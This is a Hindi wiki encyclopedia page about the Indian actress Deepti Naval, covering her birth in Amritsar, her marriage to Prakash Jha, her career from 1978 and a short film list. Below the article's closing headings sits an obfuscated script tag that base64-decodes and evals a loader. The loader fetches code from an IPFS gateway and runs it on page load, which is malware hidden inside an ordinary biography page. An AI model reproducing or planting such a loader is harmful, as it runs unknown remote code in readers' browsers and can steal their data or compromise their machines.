एक्स्प्रेशन त्रुटि: अनपेक्षित उद्गार चिन्ह "०"।

दीप्ति नवल

भारत डिस्कवरी प्रस्तुति
रविन्द्र प्रसाद (चर्चा | योगदान) द्वारा परिवर्तित 11:28, 3 जनवरी 2021 का अवतरण ('{{सूचना बक्सा कलाकार |चित्र=Deepti-Naval.jpg |चित्र का नाम=दीप्...' के साथ नया पृष्ठ बनाया)
(अंतर) ← पुराना अवतरण | वर्तमान अवतरण (अंतर) | नया अवतरण → (अंतर)
यहाँ जाएँ:भ्रमण, खोजें
दीप्ति नवल
दीप्ति नवल
पूरा नाम दीप्ति नवल
जन्म 3 फ़रवरी, 1952
जन्म भूमि अमृतसर, पंजाब
पति/पत्नी प्रकाश झा (फ़िल्म निर्देशक)
संतान पुत्री- दिशा
कर्म भूमि भारत
कर्म-क्षेत्र हिंदी सिनेमा
मुख्य फ़िल्में 'शक्ति-द पावर', 'एक घर', 'रंग बिरंगी', 'अंगूर', 'श्रीमान श्रीमती', 'हम पाँच', 'एक बार फिर' आदि।
प्रसिद्धि अभिनेत्री
नागरिकता भारतीय
सक्रिय वर्ष 1978-2020
अन्य जानकारी दीप्ति नवल ने अपने फिल्म कॅरियर की शुरुआत 1978 में उस समय के जाने-माने फिल्म निर्देशक श्याम बेनेगल की फिल्म 'जूनुन' की, लेकिन उन्हें असली लोकप्रियता 1980 में प्रदर्शित फिल्म 'एक बार फिर' से मिली।
अद्यतन‎

दीप्ति नवल (अंग्रेज़ी: Deepti Naval, जन्म- 3 फ़रवरी, 1952, अमृतसर, पंजाब) प्रसिद्ध भारतीय अभिनेत्री हैं। उनको एक हरफनमौला कलाकार के रूप में जाना जाता है। 80 और 90 के दशक की मशहूर अभ‍िनेत्र‍ियों में दीप्ति नवल का नाम शामिल है। वह एक अभिनेत्री होने के अलावा कवयित्री, कहानीकार, गायिका, फोटोग्राफर और पेंटर भी हैं। दीप्ति नवल कई चर्चित हिन्दी फिल्मों में नजर आई हैं। वह 'चश्मे बद्दूर', 'कथा', 'मिर्च मसाला', 'अंगूर' आदि फिल्मों के लिए जानी जाती हैं।

परिचय

दीप्ति नवल का जन्म 3 फ़रवरी, 1952 को हुआ था। वे अपने खुले विचारों के लिए मशहूर हैं। उनका बचपन अमरीका के न्यूयॉर्क में बीता, जहां उनके पिता सिटी यूनिवर्सिटी में शिक्षक थे। दीप्ति नवल को बचपन से ही अभिनय के साथ-साथ चित्रकारी एवं फोटोग्राफी का शौक था।

उन्होंने 1985 में मशहूर फिल्म निर्देशक प्रकाश झा से विवाह किया, लेकिन ये शादी अधिक सफल नहीं रही और चार साल बाद दोनों का तलाक हो गया। प्रकाश झा से दीप्ति नवल को एक बेटी दिशा है। दीप्ति नवल, प्रकाश झा से अलग होने के बाद भी एक अच्छे दोस्त के तौर पर उनसे मिलती हैं। दोनों तलाक के बाद अपनी बेटी और दोस्त विनोद के साथ डिनर पर भी गए थे। दीप्ति की बेटी दिशा सिंगर बनना चाहती हैं। वे अपने पिता की फिल्म राजनीति में बतौर कॉस्ट्यूम सुपरवाइजर काम कर चुकी हैं।

कॅरियर

दीप्ति नवल

दीप्ति नवल ने अपने फिल्म कॅरियर की शुरुआत 1978 में उस समय के जाने-माने फिल्म निर्देशक श्याम बेनेगल की फिल्म 'जूनुन' की, लेकिन उन्हें असली लोकप्रियता 1980 में प्रदर्शित फिल्म 'एक बार फिर' से मिली। ​जिन फिल्मों के लिए वह जानी जाती हैं, उनमें 'चश्मे बद्दूर', 'कथा' और 'साथ-साथ' प्रमुख हैं।

मुख्य फ़िल्में

दीप्ति नवल की प्रमुख फ़िल्में
वर्ष फ़िल्म
1. 1991 माने
2. 1991 एक घर
3. 1983 रंग बिरंगी
4. 1982 अंगूर
5. 1982 श्रीमान श्रीमती
6. 1980 हम पाँच
7. 1980 एक बार फिर


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>